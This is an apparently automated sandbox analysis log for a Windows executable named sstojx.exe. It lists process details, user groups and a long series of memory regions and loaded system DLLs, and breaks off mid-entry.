# Flog Txt Version 1 # Analyzer Version: 2.3.2 # Analyzer Build Date: Feb 15 2019 13:52:06 # Log Creation Date: 18.02.2019 17:18:05.333 Process: id = "1" image_name = "sstojx.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\sstojx.exe" page_root = "0x2b6f3000" os_pid = "0xe5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\sstojx.exe\" " cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013da5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 7 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 8 start_va = 0x400000 end_va = 0x41bfff entry_point = 0x400000 region_type = mapped_file name = "sstojx.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\sstojx.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\sstojx.exe") Region: id = 9 start_va = 0x776b0000 end_va = 0x77828fff entry_point = 0x776b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 12 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 13 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15 start_va = 0x7fff0000 end_va = 0x7ffc57b4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 16 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17 start_va = 0x7ffc57d12000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc57d12000" filename = "" Region: id = 157 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 158 start_va = 0x5bab0000 end_va = 0x5bb22fff entry_point = 0x5bab0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 159 start_va = 0x5bb30000 end_va = 0x5bb7efff entry_point = 0x5bb30000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 160 start_va = 0x5baa0000 end_va = 0x5baa7fff entry_point = 0x5baa0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 161 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 162 start_va = 0x74f40000 end_va = 0x7502ffff entry_point = 0x74f40000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 163 start_va = 0x75190000 end_va = 0x75305fff entry_point = 0x75190000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 164 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 165 start_va = 0x1c0000 end_va = 0x27dfff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 166 start_va = 0x746b0000 end_va = 0x74740fff entry_point = 0x746b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 167 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 168 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 169 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 170 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 171 start_va = 0x743e0000 end_va = 0x74603fff entry_point = 0x743e0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 172 start_va = 0x74750000 end_va = 0x747a8fff entry_point = 0x74750000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 173 start_va = 0x747b0000 end_va = 0x747b9fff entry_point = 0x747b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 174 start_va = 0x747c0000 end_va = 0x747ddfff entry_point = 0x747c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 175 start_va = 0x74a00000 end_va = 0x74aabfff entry_point = 0x74a00000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 176 start_va = 0x75030000 end_va = 0x7517cfff entry_point = 0x75030000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 177 start_va = 0x76c70000 end_va = 0x76daffff entry_point = 0x76c70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 178 start_va = 0x76f20000 end_va = 0x76fddfff entry_point = 0x76f20000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 179 start_va = 0x77170000 end_va = 0x77259fff entry_point = 0x77170000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 180 start_va = 0x772b0000 end_va = 0x772f2fff entry_point = 0x772b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 181 start_va = 0x77390000 end_va = 0x77549fff entry_point = 0x77390000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 182 start_va = 0x77550000 end_va = 0x775cafff entry_point = 0x77550000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 183 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 184 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 185 start_va = 0x420000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 186 start_va = 0x5b0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 187 start_va = 0x6b0000 end_va = 0x837fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 188 start_va = 0x74df0000 end_va = 0x74f0ffff entry_point = 0x74df0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 189 start_va = 0x74f10000 end_va = 0x74f3afff entry_point = 0x74f10000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 190 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 191 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 192 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 193 start_va = 0x840000 end_va = 0x9c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 194 start_va = 0x9d0000 end_va = 0x1dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 195 start_va = 0x74630000 end_va = 0x746a4fff entry_point = 0x74630000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 196 start_va = 0x1dd0000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 197 start_va = 0x74610000 end_va = 0x7462cfff entry_point = 0x74610000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 198 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 199 start_va = 0x460000 end_va = 0x460fff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 200 start_va = 0x470000 end_va = 0x470fff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 201 start_va = 0x480000 end_va = 0x480fff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 202 start_va = 0x490000 end_va = 0x490fff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 203 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 204 start_va = 0x1ec0000 end_va = 0x21f6fff entry_point = 0x1ec0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 205 start_va = 0x490000 end_va = 0x490fff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 206 start_va = 0x1dd0000 end_va = 0x1dd0fff entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 207 start_va = 0x1eb0000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 208 start_va = 0x1de0000 end_va = 0x1de0fff entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 209 start_va = 0x1df0000 end_va = 0x1df0fff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 210 start_va = 0x1e00000 end_va = 0x1e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 211 start_va = 0x2200000 end_va = 0x22fffff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 212 start_va = 0x1e00000 end_va = 0x1e15fff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 213 start_va = 0x1e20000 end_va = 0x1e27fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e20000" filename = "" Region: id = 214 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 215 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 216 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 217 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 218 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 219 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 220 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 221 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 222 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 223 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 224 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 225 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 226 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 227 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 228 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 229 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 230 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 231 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 232 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 233 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 234 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 235 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 236 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 237 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 238 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 239 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 240 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 241 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 242 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 243 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 244 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 245 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 246 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 247 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 248 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 249 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 250 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 251 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 252 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 253 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 254 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 255 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 256 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 257 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 258 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 259 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 260 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 261 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 262 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 263 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 264 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 265 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 266 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 267 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 268 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 269 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 270 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 271 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 272 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 273 start_va = 0x1de0000 end_va = 0x1de0fff entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 274 start_va = 0x1df0000 end_va = 0x1df0fff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 275 start_va = 0x1df0000 end_va = 0x1df0fff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 276 start_va = 0x1e00000 end_va = 0x1e00fff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 277 start_va = 0x1e10000 end_va = 0x1e10fff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 278 start_va = 0x1e10000 end_va = 0x1e10fff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 279 start_va = 0x1e10000 end_va = 0x1e10fff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 280 start_va = 0x1e10000 end_va = 0x1e10fff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 281 start_va = 0x75310000 end_va = 0x766cefff entry_point = 0x75310000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 282 start_va = 0x76790000 end_va = 0x76c6cfff entry_point = 0x76790000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 283 start_va = 0x74da0000 end_va = 0x74de3fff entry_point = 0x74da0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 284 start_va = 0x74ab0000 end_va = 0x74abbfff entry_point = 0x74ab0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 285 start_va = 0x77300000 end_va = 0x7738cfff entry_point = 0x77300000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 286 start_va = 0x77260000 end_va = 0x772a3fff entry_point = 0x77260000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 287 start_va = 0x75180000 end_va = 0x7518efff entry_point = 0x75180000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 288 start_va = 0x1e20000 end_va = 0x1e20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e20000" filename = "" Region: id = 289 start_va = 0x1e30000 end_va = 0x1e30fff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 290 start_va = 0x1e10000 end_va = 0x1e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 291 start_va = 0x1e30000 end_va = 0x1e45fff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 292 start_va = 0x1e10000 end_va = 0x1e17fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e10000" filename = "" Region: id = 293 start_va = 0x1e10000 end_va = 0x1e10fff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 294 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 295 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 296 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 297 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 298 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 299 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 300 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 301 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 302 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 303 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 304 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 305 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 306 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 307 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 308 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 309 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 310 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 311 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 312 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 313 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 314 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 315 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = 